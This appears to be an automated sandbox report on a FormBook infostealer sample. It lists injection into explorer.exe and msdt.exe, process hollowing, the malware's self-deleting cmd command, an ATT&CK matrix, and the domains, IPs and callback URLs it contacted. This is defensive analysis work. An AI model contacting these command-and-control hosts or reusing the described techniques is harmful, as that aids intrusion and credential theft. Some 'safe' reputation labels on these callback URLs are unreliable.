          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D30050 mov eax, dword ptr fs:[00000030h]5_2_04D30050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D30050 mov eax, dword ptr fs:[00000030h]5_2_04D30050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE1074 mov eax, dword ptr fs:[00000030h]5_2_04DE1074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD2073 mov eax, dword ptr fs:[00000030h]5_2_04DD2073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE4015 mov eax, dword ptr fs:[00000030h]5_2_04DE4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE4015 mov eax, dword ptr fs:[00000030h]5_2_04DE4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D97016 mov eax, dword ptr fs:[00000030h]5_2_04D97016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D97016 mov eax, dword ptr fs:[00000030h]5_2_04D97016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D97016 mov eax, dword ptr fs:[00000030h]5_2_04D97016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2B02A mov eax, dword ptr fs:[00000030h]5_2_04D2B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2B02A mov eax, dword ptr fs:[00000030h]5_2_04D2B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2B02A mov eax, dword ptr fs:[00000030h]5_2_04D2B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2B02A mov eax, dword ptr fs:[00000030h]5_2_04D2B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4002D mov eax, dword ptr fs:[00000030h]5_2_04D4002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4002D mov eax, dword ptr fs:[00000030h]5_2_04D4002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4002D mov eax, dword ptr fs:[00000030h]5_2_04D4002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4002D mov eax, dword ptr fs:[00000030h]5_2_04D4002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4002D mov eax, dword ptr fs:[00000030h]5_2_04D4002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1B1E1 mov eax, dword ptr fs:[00000030h]5_2_04D1B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1B1E1 mov eax, dword ptr fs:[00000030h]5_2_04D1B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1B1E1 mov eax, dword ptr fs:[00000030h]5_2_04D1B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA41E8 mov eax, dword ptr fs:[00000030h]5_2_04DA41E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D42990 mov eax, dword ptr fs:[00000030h]5_2_04D42990
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D3C182 mov eax, dword ptr fs:[00000030h]5_2_04D3C182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4A185 mov eax, dword ptr fs:[00000030h]5_2_04D4A185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D951BE mov eax, dword ptr fs:[00000030h]5_2_04D951BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D951BE mov eax, dword ptr fs:[00000030h]5_2_04D951BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D951BE mov eax, dword ptr fs:[00000030h]5_2_04D951BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D951BE mov eax, dword ptr fs:[00000030h]5_2_04D951BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D461A0 mov eax, dword ptr fs:[00000030h]5_2_04D461A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D461A0 mov eax, dword ptr fs:[00000030h]5_2_04D461A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D969A6 mov eax, dword ptr fs:[00000030h]5_2_04D969A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D3B944 mov eax, dword ptr fs:[00000030h]5_2_04D3B944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D3B944 mov eax, dword ptr fs:[00000030h]5_2_04D3B944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1B171 mov eax, dword ptr fs:[00000030h]5_2_04D1B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1B171 mov eax, dword ptr fs:[00000030h]5_2_04D1B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1C962 mov eax, dword ptr fs:[00000030h]5_2_04D1C962
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19100 mov eax, dword ptr fs:[00000030h]5_2_04D19100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19100 mov eax, dword ptr fs:[00000030h]5_2_04D19100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19100 mov eax, dword ptr fs:[00000030h]5_2_04D19100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4513A mov eax, dword ptr fs:[00000030h]5_2_04D4513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4513A mov eax, dword ptr fs:[00000030h]5_2_04D4513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D34120 mov eax, dword ptr fs:[00000030h]5_2_04D34120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D34120 mov eax, dword ptr fs:[00000030h]5_2_04D34120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D34120 mov eax, dword ptr fs:[00000030h]5_2_04D34120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D34120 mov eax, dword ptr fs:[00000030h]5_2_04D34120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D34120 mov ecx, dword ptr fs:[00000030h]5_2_04D34120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D42ACB mov eax, dword ptr fs:[00000030h]5_2_04D42ACB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D42AE4 mov eax, dword ptr fs:[00000030h]5_2_04D42AE4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4D294 mov eax, dword ptr fs:[00000030h]5_2_04D4D294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4D294 mov eax, dword ptr fs:[00000030h]5_2_04D4D294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2AAB0 mov eax, dword ptr fs:[00000030h]5_2_04D2AAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2AAB0 mov eax, dword ptr fs:[00000030h]5_2_04D2AAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4FAB0 mov eax, dword ptr fs:[00000030h]5_2_04D4FAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D152A5 mov eax, dword ptr fs:[00000030h]5_2_04D152A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D152A5 mov eax, dword ptr fs:[00000030h]5_2_04D152A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D152A5 mov eax, dword ptr fs:[00000030h]5_2_04D152A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D152A5 mov eax, dword ptr fs:[00000030h]5_2_04D152A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D152A5 mov eax, dword ptr fs:[00000030h]5_2_04D152A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DDEA55 mov eax, dword ptr fs:[00000030h]5_2_04DDEA55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA4257 mov eax, dword ptr fs:[00000030h]5_2_04DA4257
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19240 mov eax, dword ptr fs:[00000030h]5_2_04D19240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19240 mov eax, dword ptr fs:[00000030h]5_2_04D19240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19240 mov eax, dword ptr fs:[00000030h]5_2_04D19240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19240 mov eax, dword ptr fs:[00000030h]5_2_04D19240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D5927A mov eax, dword ptr fs:[00000030h]5_2_04D5927A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DCB260 mov eax, dword ptr fs:[00000030h]5_2_04DCB260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DCB260 mov eax, dword ptr fs:[00000030h]5_2_04DCB260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE8A62 mov eax, dword ptr fs:[00000030h]5_2_04DE8A62
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D15210 mov eax, dword ptr fs:[00000030h]5_2_04D15210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D15210 mov ecx, dword ptr fs:[00000030h]5_2_04D15210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D15210 mov eax, dword ptr fs:[00000030h]5_2_04D15210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D15210 mov eax, dword ptr fs:[00000030h]5_2_04D15210
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.winabeel.com
          Source: C:\Windows\explorer.exeDomain query: www.explorerthecity.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.69 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.profirma-nachfolge.com
          Source: C:\Windows\explorer.exeNetwork Connect: 188.164.131.200 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.meow-cafe.com
          Source: C:\Windows\explorer.exeDomain query: www.alpinevalleytimeshares.com
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ithacapella.com
          Source: C:\Windows\explorer.exeNetwork Connect: 155.133.132.7 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.dccheavydutydiv.net
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.223.7 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.krishnagiri.info
          Source: C:\Windows\explorer.exeDomain query: www.xfixpros.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.101.8.193 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mecs.club
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 213.32.49.255 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thefamilyorchard.net
          Source: C:\Windows\explorer.exeDomain query: www.856380692.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.worldsourcecloud.com
          Source: C:\Windows\explorer.exeDomain query: www.icepolo.com
          Source: C:\Windows\explorer.exeDomain query: www.11376.xyz
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeSection loaded: unknown target: C:\Users\user\Desktop\h8lD4SWL35.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3472Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 8E0000Jump to behavior
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeProcess created: C:\Users\user\Desktop\h8lD4SWL35.exe 'C:\Users\user\Desktop\h8lD4SWL35.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\h8lD4SWL35.exe'Jump to behavior
          Source: explorer.exe, 00000002.00000000.250871116.0000000005EA0000.00000004.00000001.sdmp, msdt.exe, 00000005.00000002.492430934.0000000003320000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.491772690.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.492430934.0000000003320000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.491772690.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.492430934.0000000003320000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000002.491015803.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000002.491772690.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.492430934.0000000003320000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000002.491772690.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.492430934.0000000003320000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_004059FF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_004059FF

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273894363.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273962735.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.492349966.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.492377238.0000000002EE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.h8lD4SWL35.exe.3150000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.h8lD4SWL35.exe.3150000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273894363.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273962735.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.492349966.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.492377238.0000000002EE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.h8lD4SWL35.exe.3150000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.h8lD4SWL35.exe.3150000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery231Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information4NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing12LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 374845 Sample: h8lD4SWL35.exe Startdate: 24/03/2021 Architecture: WINDOWS Score: 100 32 www.ithacapella.com 2->32 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 5 other signatures 2->48 11 h8lD4SWL35.exe 11 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\...\8pspgamerixa.dll, PE32 11->30 dropped 58 Detected unpacking (changes PE section rights) 11->58 60 Maps a DLL or memory area into another process 11->60 62 Tries to detect virtualization through RDTSC time measurements 11->62 15 h8lD4SWL35.exe 11->15         started        signatures6 process7 signatures8 64 Modifies the context of a thread in another process (thread injection) 15->64 66 Maps a DLL or memory area into another process 15->66 68 Sample uses process hollowing technique 15->68 70 Queues an APC in another process (thread injection) 15->70 18 explorer.exe 15->18 injected process9 dnsIp10 34 www.explorerthecity.com 91.195.240.94, 49699, 80 SEDO-ASDE Germany 18->34 36 www.meow-cafe.com 213.32.49.255, 49706, 80 OVHFR France 18->36 38 20 other IPs or domains 18->38 50 System process connects to network (likely due to code injection or exploit) 18->50 22 msdt.exe 12 18->22         started        signatures11 process12 dnsIp13 40 www.11376.xyz 22->40 52 Modifies the context of a thread in another process (thread injection) 22->52 54 Maps a DLL or memory area into another process 22->54 56 Tries to detect virtualization through RDTSC time measurements 22->56 26 cmd.exe 1 22->26         started        signatures14 process15 process16 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          h8lD4SWL35.exe25%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nss398D.tmp\8pspgamerixa.dll100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\nss398D.tmp\8pspgamerixa.dll33%ReversingLabsWin32.Trojan.Pwsx

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.h8lD4SWL35.exe.3150000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.msdt.exe.2dd5420.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.2.msdt.exe.5227960.6.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.1.h8lD4SWL35.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.h8lD4SWL35.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.profirma-nachfolge.com/nsag/?njndiL=9rtTFPBhfVt4&AjU=UkBnU3nUIfYrxnxuiA7IQSHNtnWcHyh0bpM1KLOn6D8O+IO5Dhvu3uMtlrW7JTyKOcvi0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.alpinevalleytimeshares.com/nsag/?AjU=nc5cR7fY8cj1BazpizuRFZBRA29btuqKtt0gl+AxZx4jZyN4s2dbmE6wVRrG6oTnsIdd&njndiL=9rtTFPBhfVt40%Avira URL Cloudsafe
          http://www.11376.xyz/nsag/?AjU=WEYxfFr10ymru5OxaDoG/Amdd7m3iDRjniOpUd0nZrfzDh8VapTmqk6sbIliE5dwT0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          www.856380692.xyz/nsag/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.11376.xyz/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.11376.xyz/c0%Avira URL Cloudsafe
          http://www.worldsourcecloud.com/nsag/?AjU=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4ECTuyrFUZI2G&njndiL=9rtTFPBhfVt40%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.winabeel.com/nsag/?njndiL=9rtTFPBhfVt4&AjU=Zdd+03lFPdaO8MwVGmYqRiw2DY9Wd51jzurMe9uohGYtv5+xzmK27QiPS7vk8ejd2SQP0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.meow-cafe.com/nsag/?AjU=IhldT5wJOWXugkoAiz0IGMqIRU2spNDmcqQlMhwJn5b9F51tDlQqNKQjjCxGsZbl2k8T&njndiL=9rtTFPBhfVt40%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.mecs.club/nsag/?AjU=0eG3A+xdiTlSChflywEKXt4QE5sc4N54SGCNaNShv/sJg/KK4GWzQn3UfuFvWFAkrsnB&njndiL=9rtTFPBhfVt40%Avira URL Cloudsafe
          http://www.krishnagiri.info/nsag/?njndiL=9rtTFPBhfVt4&AjU=hPHybZPTt185zNO3xz6D1Y5bPXZXETq0TTvyEiyuX6EjGbgQmrQNvgkWI3CJg50tk2Lo0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.dccheavydutydiv.net/nsag/?njndiL=9rtTFPBhfVt4&AjU=7cP8xnb8WyCvwLiClb+mYodtMUI7w/zEY/AqgyK4ue3XLBeWVzU6LHeJbcAyXLM59Zs/0%Avira URL Cloudsafe
          http://www.icepolo.com/nsag/?njndiL=9rtTFPBhfVt4&AjU=KrISVuELCs1q3UlzX6dLs0GN1f73ulMhv38PeKk8K2lo4f0Q4j/pm/FXRZPdylmCs2jx0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          xfixpros.com
          		34.102.136.180
          		truefalse
            		unknown
            www.explorerthecity.com
            		91.195.240.94
            		truetrue
              		unknown
              parking.namesilo.com
              		188.164.131.200
              		truefalse
                		high
                www.profirma-nachfolge.com
                		217.160.0.69
                		truetrue
                  		unknown
                  www.krishnagiri.info
                  		199.59.242.153
                  		truetrue
                    		unknown
                    webacc5.sd3.ghst.net
                    		155.133.132.7
                    		truetrue
                      		unknown
                      winabeel.com
                      		34.102.136.180
                      		truefalse
                        		unknown
                        dccheavydutydiv.net
                        		34.102.136.180
                        		truefalse
                          		unknown
                          www.meow-cafe.com
                          		213.32.49.255
                          		truetrue
                            		unknown
                            thefamilyorchard.net
                            		34.102.136.180
                            		truefalse
                              		unknown
                              www.worldsourcecloud.com
                              		172.67.223.7
                              		truetrue
                                		unknown
                                www.icepolo.com
                                		64.190.62.111
                                		truetrue
                                  		unknown
                                  www.11376.xyz
                                  		23.101.8.193
                                  		truetrue
                                    		unknown
                                    www.dccheavydutydiv.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.winabeel.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.xfixpros.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.mecs.club
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.thefamilyorchard.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.alpinevalleytimeshares.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.856380692.xyz
                                                		unknown
